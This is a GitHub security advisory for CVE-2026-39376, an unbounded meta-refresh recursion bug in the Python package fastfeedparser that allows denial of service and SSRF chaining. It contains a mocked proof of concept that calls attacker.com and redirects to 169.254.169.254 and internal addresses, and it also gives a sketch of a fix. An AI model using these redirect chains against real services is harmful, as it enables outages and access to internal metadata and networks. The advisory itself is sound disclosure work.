GHSA-4GX2-PC4F-WQ37
Vulnerability from github – Published: 2026-04-08 00:12 – Updated: 2026-04-08 00:12

Summary
When parse() fetches a URL that returns an HTML page containing a <meta http-equiv="refresh"> tag, it recursively calls itself with the redirect URL — with no depth limit, no visited-URL deduplication, and no redirect count cap. An attacker-controlled server that returns an infinite chain of HTML meta-refresh responses causes unbounded recursion, exhausting the Python call stack and crashing the process. This vulnerability can also be chained with the companion SSRF issue to reach internal network targets after bypassing the initial URL check.
Details
parse() catches ValueError on XML parse failure, extracts a meta-refresh URL from the HTML response via _extract_meta_refresh_url(), and tail-calls itself with that URL. The recursive call is unconditional — there is no maximum redirect depth, no set of already-visited URLs, and no guard against self-referential or looping redirects.
fastfeedparser/main.py — parse() (recursive sink):
```python
def parse(source: str | bytes, ...) -> FastFeedParserDict:
    is_url = isinstance(source, str) and source.startswith(("http://", "https://"))
    if is_url:
        content = _fetch_url_content(source)
    try:
        return _parse_content(content, ...)
    except ValueError as e:
        ...
        redirect_url = _extract_meta_refresh_url(content, source)
        if redirect_url is None:
            raise
        return parse(redirect_url, ...)  # ← unconditional recursion, no depth limit
```
_extract_meta_refresh_url() uses urljoin(base_url, match.group(1)) so relative, protocol-relative (//host/path), and absolute URLs in the content= attribute are all followed.
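The breadth of that `urljoin()` resolution can be seen in isolation with the standard library (the base URL here is illustrative):

```python
from urllib.parse import urljoin

base = "http://example.com/feeds/blog"

# Relative paths resolve against the fetched page's URL:
print(urljoin(base, "next.xml"))             # http://example.com/feeds/next.xml

# Protocol-relative URLs swap in a new host, keeping the scheme:
print(urljoin(base, "//10.0.0.1/admin"))     # http://10.0.0.1/admin

# Absolute URLs replace the base entirely:
print(urljoin(base, "http://192.168.1.1/"))  # http://192.168.1.1/
```

Any of these three forms in the `content=` attribute therefore yields a followable absolute URL, including one pointing at an internal host.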
PoC
No live server required. The following monkeypatches _fetch_url_content to return an infinite HTML meta-refresh chain and confirms unbounded recursion:
```python
import fastfeedparser.main as m

call_count = 0
_orig = m._fetch_url_content

def mock_fetch(url):
    global call_count
    call_count += 1
    if call_count > 10:
        raise RuntimeError(f"Stopped at call {call_count}")
    next_url = f"http://169.254.169.254/step{call_count}/"
    return f"""<html><head>
<meta http-equiv="refresh" content="0; url={next_url}">
</head><body>not a feed</body></html>""".encode()

m._fetch_url_content = mock_fetch

try:
    m.parse("http://attacker.com/loop")
except RuntimeError as e:
    print(f"CONFIRMED infinite loop: {e}")
finally:
    m._fetch_url_content = _orig
    print(f"Total fetches before stop: {call_count}")

# Output:
# CONFIRMED infinite loop: Stopped at call 11
# Total fetches before stop: 11
```
Each recursive call performs a real HTTP request (30 s timeout), HTML parsing, and a Python stack frame allocation. With Python's default recursion limit of 1000 and a 30 s per-request timeout, a single attacker request can hold a server thread busy for up to ~8 hours before a RecursionError is raised.
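The stack-exhaustion half of that claim can be demonstrated without fastfeedparser at all. The sketch below stands in for `parse()` with a trivial self-recursive function (`chase` is a hypothetical name, not from the library) and shrinks the interpreter's recursion limit so the failure is immediate:

```python
import sys

def chase(depth=0):
    # Stand-in for parse() calling itself once per meta-refresh hop:
    # each hop consumes one interpreter stack frame, with no cap.
    return chase(depth + 1)

old_limit = sys.getrecursionlimit()  # 1000 by default in CPython
sys.setrecursionlimit(100)           # shrink it so the demo fails fast
try:
    chase()
except RecursionError:
    print("RecursionError: hop chain hit the interpreter's frame limit")
finally:
    sys.setrecursionlimit(old_limit)
```

In the real attack each of those frames also costs a network round-trip, which is where the multi-hour thread-hold figure comes from (~1000 hops × up to 30 s each).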
SSRF chain variant: The first response can be legitimate HTML redirecting to an internal address (http://192.168.1.1/), letting the redirect loop also serve as an SSRF bypass for targets that would otherwise be blocked by application-level URL validation applied only to the initial URL.
Impact
This is a denial-of-service vulnerability with a secondary SSRF-chaining impact. Any application that accepts user-supplied feed URLs and calls fastfeedparser.parse() is affected — including RSS aggregators, feed preview services, and "subscribe by URL" features. An attacker with no authentication can:
- Hold a server worker thread indefinitely (one request per attacker connection)
- Crash the worker process via RecursionError after ~1000 redirects
- Use the redirect chain to pivot SSRF requests to internal network targets
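The advisory does not reproduce the 0.5.10 fix; a minimal guard of the kind such a fix requires — a hop cap plus visited-URL deduplication — can be sketched as follows. All names here (`parse_guarded`, `fake_fetch`, `MAX_HOPS`) are illustrative, not fastfeedparser's actual API:

```python
MAX_HOPS = 5  # illustrative redirect cap

def fake_fetch(url):
    # Simulates an attacker server: every page "redirects" onward forever.
    # Stands in for fetching + _extract_meta_refresh_url() combined.
    n = int(url.rsplit("/", 1)[1])
    return f"http://evil.test/{n + 1}"

def parse_guarded(url, _depth=0, _seen=None):
    _seen = set() if _seen is None else _seen
    if _depth > MAX_HOPS:
        raise ValueError(f"meta-refresh limit of {MAX_HOPS} exceeded")
    if url in _seen:
        raise ValueError(f"meta-refresh loop detected at {url}")
    _seen.add(url)
    redirect = fake_fetch(url)
    return parse_guarded(redirect, _depth + 1, _seen)

try:
    parse_guarded("http://evil.test/0")
except ValueError as e:
    print(e)  # chain stops after MAX_HOPS hops instead of recursing to stack exhaustion
```

The depth counter bounds attacker-controlled chains of distinct URLs; the `_seen` set catches self-referential or A→B→A loops in a single hop.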
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.5.9"
},
"package": {
"ecosystem": "PyPI",
"name": "fastfeedparser"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-39376"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-08T00:12:26Z",
"nvd_published_at": "2026-04-07T20:16:32Z",
"severity": "HIGH"
},
"details": "### Summary\nWhen `parse()` fetches a URL that returns an HTML page containing a `\u003cmeta http-equiv=\"refresh\"\u003e` tag, it recursively calls itself with the redirect URL \u2014 with no depth limit, no visited-URL deduplication, and no redirect count cap. An attacker-controlled server that returns an infinite chain of HTML meta-refresh responses causes unbounded recursion, exhausting the Python call stack and crashing the process. This vulnerability can also be chained with the companion SSRF issue to reach internal network targets after bypassing the initial URL check.\n\n\n### Details\n`parse()` catches `ValueError` on XML parse failure, extracts a meta-refresh URL from the HTML response via `_extract_meta_refresh_url()`, and tail-calls itself with that URL. The recursive call is unconditional \u2014 there is no maximum redirect depth, no set of already-visited URLs, and no guard against self-referential or looping redirects.\n\n**`fastfeedparser/main.py` \u2014 `parse()` (recursive sink):**\n```python\ndef parse(source: str | bytes, ...) -\u003e FastFeedParserDict:\n is_url = isinstance(source, str) and source.startswith((\"http://\", \"https://\"))\n if is_url:\n content = _fetch_url_content(source)\n try:\n return _parse_content(content, ...)\n except ValueError as e:\n ...\n redirect_url = _extract_meta_refresh_url(content, source)\n if redirect_url is None:\n raise\n return parse(redirect_url, ...) # \u2190 unconditional recursion, no depth limit\n```\n\n`_extract_meta_refresh_url()` uses `urljoin(base_url, match.group(1))` so relative, protocol-relative (`//host/path`), and absolute URLs in the `content=` attribute are all followed.\n\n### PoC\nNo live server required. 
The following monkeypatches `_fetch_url_content` to return an infinite HTML meta-refresh chain and confirms unbounded recursion:\n\n```python\nimport fastfeedparser.main as m\n\ncall_count = 0\n_orig = m._fetch_url_content\n\ndef mock_fetch(url):\n global call_count\n call_count += 1\n if call_count \u003e 10:\n raise RuntimeError(f\"Stopped at call {call_count}\")\n next_url = f\"http://169.254.169.254/step{call_count}/\"\n return f\"\"\"\u003chtml\u003e\u003chead\u003e\n\u003cmeta http-equiv=\"refresh\" content=\"0; url={next_url}\"\u003e\n\u003c/head\u003e\u003cbody\u003enot a feed\u003c/body\u003e\u003c/html\u003e\"\"\".encode()\n\nm._fetch_url_content = mock_fetch\n\ntry:\n m.parse(\"http://attacker.com/loop\")\nexcept RuntimeError as e:\n print(f\"CONFIRMED infinite loop: {e}\")\nfinally:\n m._fetch_url_content = _orig\n print(f\"Total fetches before stop: {call_count}\")\n\n# Output:\n# CONFIRMED infinite loop: Stopped at call 11\n# Total fetches before stop: 11\n```\n\nEach recursive call performs a real HTTP request (30 s timeout), HTML parsing, and a Python stack frame allocation. With Python\u0027s default recursion limit of 1000 and a 30 s per-request timeout, a single attacker request can hold a server thread busy for up to ~8 hours before a `RecursionError` is raised.\n\n**SSRF chain variant:** The first response can be legitimate HTML redirecting to an internal address (`http://192.168.1.1/`), letting the redirect loop also serve as an SSRF bypass for targets that would otherwise be blocked by application-level URL validation applied only to the initial URL.\n\n\n\n### Impact\nThis is a denial-of-service vulnerability with a secondary SSRF-chaining impact. Any application that accepts user-supplied feed URLs and calls `fastfeedparser.parse()` is affected \u2014 including RSS aggregators, feed preview services, and \"subscribe by URL\" features. 
An attacker with no authentication can:\n\n- Hold a server worker thread indefinitely (one request per attacker connection)\n- Crash the worker process via `RecursionError` after ~1000 redirects\n- Use the redirect chain to pivot SSRF requests to internal network targets",
"id": "GHSA-4gx2-pc4f-wq37",
"modified": "2026-04-08T00:12:26Z",
"published": "2026-04-08T00:12:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kagisearch/fastfeedparser/security/advisories/GHSA-4gx2-pc4f-wq37"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39376"
},
{
"type": "PACKAGE",
"url": "https://github.com/kagisearch/fastfeedparser"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "FastFeedParser has an infinite redirect loop DoS via meta-refresh chain"
}
Sightings
| Author | Source | Type | Date | Other |
|---|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.